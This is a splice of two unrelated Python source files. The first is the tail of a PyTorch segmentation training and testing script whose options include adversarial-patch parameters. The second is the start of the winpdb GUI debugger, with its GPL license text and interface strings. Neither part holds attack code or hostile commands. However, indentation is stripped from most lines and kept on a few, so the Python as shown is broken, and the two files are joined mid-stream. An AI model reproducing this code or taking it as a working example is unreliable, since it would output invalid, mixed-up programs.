target_var = torch.autograd.Variable(target)
# compute output
output = model(input_var)[0]
loss = criterion(output, target_var)
# measure accuracy and record loss
# prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.data[0], input.size(0))
if eval_score is not None:
scores.update(eval_score(output, target_var), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % print_freq == 0:
logger.info('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Score {top1.val:.3f} ({top1.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
data_time=data_time, loss=losses, top1=scores))
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, 'model_best.pth.tar')
def train_seg(args):
batch_size = args.batch_size
num_workers = args.workers
crop_size = args.crop_size
print(' '.join(sys.argv))
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, None,
pretrained=True)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
criterion = nn.NLLLoss2d(ignore_index=255)
criterion.cuda()
# Data loading code
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'],
std=info['std'])
t = []
if args.random_rotate > 0:
t.append(transforms.RandomRotate(args.random_rotate))
if args.random_scale > 0:
t.append(transforms.RandomScale(args.random_scale))
t.extend([transforms.RandomCrop(crop_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize])
train_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'train', transforms.Compose(t)),
batch_size=batch_size, shuffle=True, num_workers=num_workers,
pin_memory=True, drop_last=True
)
val_loader = torch.utils.data.DataLoader(
SegList(data_dir, 'val', transforms.Compose([
transforms.RandomCrop(crop_size),
transforms.ToTensor(),
normalize,
])),
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=True, drop_last=True
)
    # define the optimizer
optimizer = torch.optim.SGD(single_model.optim_parameters(),
args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
cudnn.benchmark = True
best_prec1 = 0
start_epoch = 0
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
if args.evaluate:
validate(val_loader, model, criterion, eval_score=accuracy)
return
for epoch in range(start_epoch, args.epochs):
lr = adjust_learning_rate(args, optimizer, epoch)
logger.info('Epoch: [{0}]\tlr {1:.06f}'.format(epoch, lr))
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch,
eval_score=accuracy)
# evaluate on validation set
prec1 = validate(val_loader, model, criterion, eval_score=accuracy)
is_best = prec1 > best_prec1
best_prec1 = max(prec1, best_prec1)
checkpoint_path = 'checkpoint_latest.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_prec1': best_prec1,
}, is_best, filename=checkpoint_path)
if (epoch + 1) % 10 == 0:
history_path = 'checkpoint_{:03d}.pth.tar'.format(epoch + 1)
shutil.copyfile(checkpoint_path, history_path)
def adjust_learning_rate(args, optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
if args.lr_mode == 'step':
lr = args.lr * (0.1 ** (epoch // args.step))
elif args.lr_mode == 'poly':
lr = args.lr * (1 - epoch / args.epochs) ** 0.9
else:
raise ValueError('Unknown lr mode {}'.format(args.lr_mode))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
return lr
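# Illustrative worked example (not part of the original script), for a
# hypothetical base lr of 0.01:
#   'step' mode with args.step = 30: epochs 0-29 -> 0.01, 30-59 -> 0.001, 60-89 -> 0.0001
#   'poly' mode with args.epochs = 100: lr = 0.01 * (1 - epoch / 100) ** 0.9
#   (true division), e.g. about 0.0054 at epoch 50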
def fast_hist(pred, label, n):
k = (label >= 0) & (label < n)
return np.bincount(
n * label[k].astype(int) + pred[k], minlength=n ** 2).reshape(n, n)
def per_class_iu(hist):
return np.diag(hist) / (hist.sum(1) + hist.sum(0) - np.diag(hist))
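# Illustrative sketch (not part of the original script; it assumes the numpy
# import already present in this file): accumulating a confusion matrix with
# fast_hist and reading per-class IoU from it. Rows index the ground-truth class,
# columns the predicted class, and labels outside [0, n), such as the ignore
# label 255, are dropped by the mask inside fast_hist.
def _example_miou():
    n = 2
    pred = np.array([0, 0, 1, 1])
    label = np.array([0, 1, 1, 255])   # last pixel is ignored
    hist = fast_hist(pred, label, n)   # [[1, 0], [1, 1]]
    ious = per_class_iu(hist)          # [0.5, 0.5]
    return np.nanmean(ious)            # 0.5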
def save_output_images(predictions, filenames, output_dir):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
# pdb.set_trace()
for ind in range(len(filenames)):
im = Image.fromarray(predictions[ind].astype(np.uint8))
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def save_colorful_images(predictions, filenames, output_dir, palettes):
"""
Saves a given (B x C x H x W) into an image file.
If given a mini-batch tensor, will save the tensor as a grid of images.
"""
for ind in range(len(filenames)):
im = Image.fromarray(palettes[predictions[ind].squeeze()])
fn = os.path.join(output_dir, filenames[ind][:-4] + '.png')
out_dir = split(fn)[0]
if not exists(out_dir):
os.makedirs(out_dir)
im.save(fn)
def test(eval_data_loader, model, num_classes,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
for iter, (image, label, name) in enumerate(eval_data_loader):
data_time.update(time.time() - end)
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
_, pred = torch.max(final, 1)
pred = pred.cpu().data.numpy()
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
def resize_4d_tensor(tensor, width, height):
tensor_cpu = tensor.cpu().numpy()
if tensor.size(2) == height and tensor.size(3) == width:
return tensor_cpu
out_size = (tensor.size(0), tensor.size(1), height, width)
out = np.empty(out_size, dtype=np.float32)
def resize_one(i, j):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
def resize_channel(j):
for i in range(tensor.size(0)):
out[i, j] = np.array(
Image.fromarray(tensor_cpu[i, j]).resize(
(width, height), Image.BILINEAR))
# workers = [threading.Thread(target=resize_one, args=(i, j))
# for i in range(tensor.size(0)) for j in range(tensor.size(1))]
workers = [threading.Thread(target=resize_channel, args=(j,))
for j in range(tensor.size(1))]
for w in workers:
w.start()
for w in workers:
w.join()
# for i in range(tensor.size(0)):
# for j in range(tensor.size(1)):
# out[i, j] = np.array(
# Image.fromarray(tensor_cpu[i, j]).resize(
# (w, h), Image.BILINEAR))
# out = tensor.new().resize_(*out.shape).copy_(torch.from_numpy(out))
return out
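# Illustrative note (not part of the original script): resize_4d_tensor bilinearly
# resizes every (H, W) channel map of a (B, C, H, W) score tensor to a common
# resolution so that multi-scale outputs can be summed in test_ms below, e.g.
#   resize_4d_tensor(torch.zeros(1, 19, 512, 1024), width=2048, height=1024)
# returns a numpy array of shape (1, 19, 1024, 2048).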
def test_ms(eval_data_loader, model, num_classes, scales,
output_dir='pred', has_gt=True, save_vis=False):
model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
end = time.time()
hist = np.zeros((num_classes, num_classes))
num_scales = len(scales)
for iter, input_data in enumerate(eval_data_loader):
data_time.update(time.time() - end)
if has_gt:
name = input_data[2]
label = input_data[1]
else:
name = input_data[1]
h, w = input_data[0].size()[2:4]
images = [input_data[0]]
images.extend(input_data[-num_scales:])
# pdb.set_trace()
outputs = []
for image in images:
image_var = Variable(image, requires_grad=False, volatile=True)
final = model(image_var)[0]
outputs.append(final.data)
final = sum([resize_4d_tensor(out, w, h) for out in outputs])
# _, pred = torch.max(torch.from_numpy(final), 1)
# pred = pred.cpu().numpy()
pred = final.argmax(axis=1)
batch_time.update(time.time() - end)
if save_vis:
save_output_images(pred, name, output_dir)
save_colorful_images(pred, name, output_dir + '_color',
CITYSCAPE_PALETTE)
if has_gt:
label = label.numpy()
hist += fast_hist(pred.flatten(), label.flatten(), num_classes)
logger.info('===> mAP {mAP:.3f}'.format(
mAP=round(np.nanmean(per_class_iu(hist)) * 100, 2)))
end = time.time()
logger.info('Eval: [{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
.format(iter, len(eval_data_loader), batch_time=batch_time,
data_time=data_time))
if has_gt: #val
ious = per_class_iu(hist) * 100
logger.info(' '.join('{:.03f}'.format(i) for i in ious))
return round(np.nanmean(ious), 2)
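# Illustrative note (not part of the original script): test_ms fuses the scales by
# resizing every scale's (B, C, H, W) score map back to the original resolution
# with resize_4d_tensor, summing the maps, and taking the argmax over the class
# axis; since the argmax is unaffected by a positive constant factor, summing the
# per-scale scores is equivalent to averaging them.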
def test_seg(args):
batch_size = args.batch_size
num_workers = args.workers
phase = args.phase
for k, v in args.__dict__.items():
print(k, ':', v)
single_model = DRNSeg(args.arch, args.classes, pretrained_model=None,
pretrained=False)
if args.pretrained:
single_model.load_state_dict(torch.load(args.pretrained))
model = torch.nn.DataParallel(single_model).cuda()
data_dir = args.data_dir
info = json.load(open(join(data_dir, 'info.json'), 'r'))
normalize = transforms.Normalize(mean=info['mean'], std=info['std'])
scales = [0.5, 0.75, 1.25, 1.5, 1.75]
if args.ms:
dataset = SegListMS(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), scales)
else:
dataset = SegList(data_dir, phase, transforms.Compose([
transforms.ToTensor(),
normalize,
]), out_name=True)
test_loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size, shuffle=False, num_workers=num_workers,
pin_memory=False
)
cudnn.benchmark = True
# optionally resume from a checkpoint
start_epoch = 0
if args.resume:
if os.path.isfile(args.resume):
logger.info("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
model.load_state_dict(checkpoint['state_dict'])
logger.info("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
logger.info("=> no checkpoint found at '{}'".format(args.resume))
out_dir = '{}_{:03d}_{}'.format(args.arch, start_epoch, phase)
if len(args.test_suffix) > 0:
out_dir += '_' + args.test_suffix
if args.ms:
out_dir += '_ms'
if args.ms:
mAP = test_ms(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt,
output_dir=out_dir,
scales=scales)
else:
mAP = test(test_loader, model, args.classes, save_vis=True,
has_gt=phase != 'test' or args.with_gt, output_dir=out_dir)
logger.info('mAP: %f', mAP)
def parse_args():
# Training settings
parser = argparse.ArgumentParser(description='')
parser.add_argument('cmd', choices=['train', 'test'])
parser.add_argument('-d', '--data-dir', default="/mnt/HDD2/datasets/cityscapes/")
parser.add_argument('--save-dir', default='data_val/vis')
parser.add_argument('-c', '--classes', default=19, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
# parser.add_argument('-tb', '--tb')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
parser.add_argument('--starting', type=int, default=None)
parser.add_argument('--ending', type=int, default=None)
parser.add_argument('--K', type=int, default=10)
parser.add_argument('--gpus', type=str, default='3,4')
parser.add_argument('--tb', default=0, type=int, help='tensorboard')
    parser.add_argument('--outname', default='result/result_', type=str, help='output file name prefix')
    parser.add_argument('--patchmode', default=0, type=int, help='patch mode')
    parser.add_argument('--std', default=1, type=float, help='standard deviation')
    parser.add_argument('--database', default='dag', type=str, help='database')
    parser.add_argument('--use_cuda', default='True', type=str, help='use CUDA')
parser.add_argument('--interval', type=int, default=1)
parser.add_argument('--attack-iteration', type=int, default=100)
parser.add_argument('--loss-interval', type=int, default=2)
parser.add_argument('--patch-size', type=int, default=128)
parser.add_argument('--coefficient', type=float, default=0.05)
parser.add_argument('--clip', type=float, default=0.1)
parser.add_argument('--threshold', type=float, default=1.0)
parser.add_argument('--bound-type', type=str, default='l2')
parser.add_argument('--random_gaussian', type=float, default=0.5)
parser.add_argument('--bound-threshold', type=float, default=0.06)
args = parser.parse_args()
assert args.data_dir is not None
assert args.classes > 0
# print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
path = split(args.outname)[0]
if not exists(path):
os.makedirs(path)
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
winpdb.py
|
#! /usr/bin/env python
"""
winpdb.py
A GUI for rpdb2.py
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
ABOUT_NOTICE = """Winpdb is a platform independent GPL Python debugger with support for
multiple threads, namespace modification, embedded debugging,
encrypted communication and is up to 20 times faster than pdb.
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
Credits:
Work on version 1.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
import sys
WXVER = "2.6"
STR_WXPYTHON_ERROR_TITLE = 'Winpdb Error'
STR_WXPYTHON_ERROR_MSG = """wxPython was not found.
wxPython 2.6 or higher is required to run the winpdb GUI.
wxPython is the graphical user interface toolkit used by Winpdb.
You can find more information on wxPython at http://www.wxpython.org/
The Unicode version of wxPython is recommended for Winpdb.
To use the debugger without a GUI, run rpdb2."""
STR_X_ERROR_MSG = """It was not possible to start Winpdb.
A possible reason is that the X server (Windowing system) is not started.
Start the X server or try to use rpdb2 instead of winpdb."""
import rpdb2
if 'wx' not in sys.modules and 'wxPython' not in sys.modules:
try:
import wxversion
wxversion.ensureMinimal(WXVER)
except ImportError:
rpdb2._print(STR_WXPYTHON_ERROR_MSG, sys.__stderr__)
try:
import Tkinter
import tkMessageBox
Tkinter.Tk().wm_withdraw()
tkMessageBox.showerror(STR_WXPYTHON_ERROR_TITLE, STR_WXPYTHON_ERROR_MSG)
except:
pass
sys.exit(1)
import wx
assert wx.VERSION_STRING >= WXVER
import wx.lib.wxpTag
import wx.gizmos
import wx.html
import wx.lib.mixins.listctrl as listmix
import wx.stc as stc
import webbrowser
import traceback
import cStringIO
import threading
import xmlrpclib
import tempfile
import textwrap
import keyword
import weakref
import base64
import socket
import string
import codecs
import pickle
import Queue
import time
import os
import re
MARKER_BREAKPOINT_ENABLED = 5
MARKER_BREAKPOINT_DISABLED = 6
MARKER_CURRENT_LINE = 7
MARKER_CURRENT_LINE_HIT = 8
MARKER_CALL = 0
MARKER_LINE = 1
MARKER_RETURN = 2
MARKER_EXCEPTION = 3
MARKER_RUNNING = 4
MARKER_LIST = [MARKER_BREAKPOINT_ENABLED, MARKER_BREAKPOINT_DISABLED, MARKER_CURRENT_LINE, MARKER_CURRENT_LINE_HIT, MARKER_CALL, MARKER_LINE, MARKER_RETURN, MARKER_EXCEPTION, MARKER_RUNNING]
CAPTION_SOURCE = "Source"
CAPTION_CONSOLE = "Console"
CAPTION_THREADS = "Threads"
CAPTION_STACK = "Stack"
CAPTION_NAMESPACE = "Namespace"
CONSOLE_PROMPT = "\n> "
CONSOLE_COMPLETIONS = '\nAvailable completions:\n%s'
COMPLETIONS_NOTICE = 'NEW: Use CTRL-N for auto completion in the following commands: launch, eval and exec.'
COMPLETIONS_WARNING = '\nDisplay all %d possibilities? (y or n)'
COMPLETIONS_WARNING_CONFIRM_CHARS = ['y', 'Y']
COMPLETIONS_WARNING_THRESHOLD = 32
ENABLED = True
DISABLED = False
WINPDB_WILDCARD = "Python source (*.py;*.pyw)|*.py;*.pyw|All files (*)|*"
PYTHON_WARNING_TITLE = "Python Interpreter Warning"
PYTHON_WARNING_MSG = """Winpdb was started with the wrong Python interpreter version.
Winpdb path is:
%s
Python interpreter path is:
%s"""
MSG_WARNING_TRAP = "Are you sure that you want to disable the trapping of unhandled exceptions? If you click Yes unhandled exceptions will not be caught."
MSG_WARNING_UNHANDLED_EXCEPTION = "An unhandled exception was caught. Would you like to analyze it?"
MSG_WARNING_TITLE = "Warning"
MSG_WARNING_TEMPLATE = "%s\n\nClick 'Cancel' to ignore this warning in this session."
MSG_ERROR_TITLE = "Error"
MSG_ERROR_FILE_NOT_FOUND = "File not found."
MSG_ERROR_FILE_NOT_PYTHON = "'%s' does not seem to be a Python source file. Only Python files are accepted."
STR_FILE_LOAD_ERROR = "Failed to load source file '%s' from debuggee."
STR_FILE_LOAD_ERROR2 = """Failed to load source file '%s' from debuggee.
You may continue to debug, but you will not see
source lines from this file."""
STR_BLENDER_SOURCE_WARNING = "You attached to a Blender Python script. To be able to see the script's source you need to load it into the Blender text window and launch the script from there."
STR_EMBEDDED_WARNING = "You attached to an embedded debugger. Winpdb may become unresponsive during periods in which the Python interpreter is inactive."
STR_EXIT_WARNING = """The debugger is attached to a script. Would you like to stop the script?
If you click 'No' the debugger will attempt to detach before exiting."""
STR_WXPYTHON_ANSI_WARNING_TITLE = 'wxPython ANSI Warning'
STR_WXPYTHON_ANSI_WARNING_MSG = """The version of wxPython that was found does not support Unicode. wxPython is the graphical user interface toolkit used by Winpdb. You may experience some functionality limitations when debugging Unicode programs with this version of wxPython. If you need to debug Unicode programs it is recommended that you install the Unicode version of wxPython. You can find more information on wxPython at http://www.wxpython.org/"""
STR_MORE_ABOUT_BREAKPOINTS = """You can set conditional breakpoints with the 'bp' console command, disable or enable specific breakpoints with the 'bd' and 'be' commands and even load and save different sets of breakpoints with the 'load' and 'save' console commands. To learn more about these commands type 'help <command>' at the console prompt."""
STR_HOW_TO_JUMP = """You can jump to a different line in the current scope with the 'jump' console command. Type 'help jump' at the console prompt for more information."""
DLG_EXPR_TITLE = "Enter Expression"
DLG_ENCODING_TITLE = "Encoding"
DLG_SYNCHRONICITY_TITLE = "Synchronicity"
DLG_PWD_TITLE = "Password"
DLG_OPEN_TITLE = "Open Source"
DLG_LAUNCH_TITLE = "Launch"
DLG_ATTACH_TITLE = "Attach"
STATIC_EXPR = """The new expression will be evaluated at the debuggee
and its value will be set to the item."""
CHECKBOX_ENCODING = "Output non ASCII characters as an escape sequence."
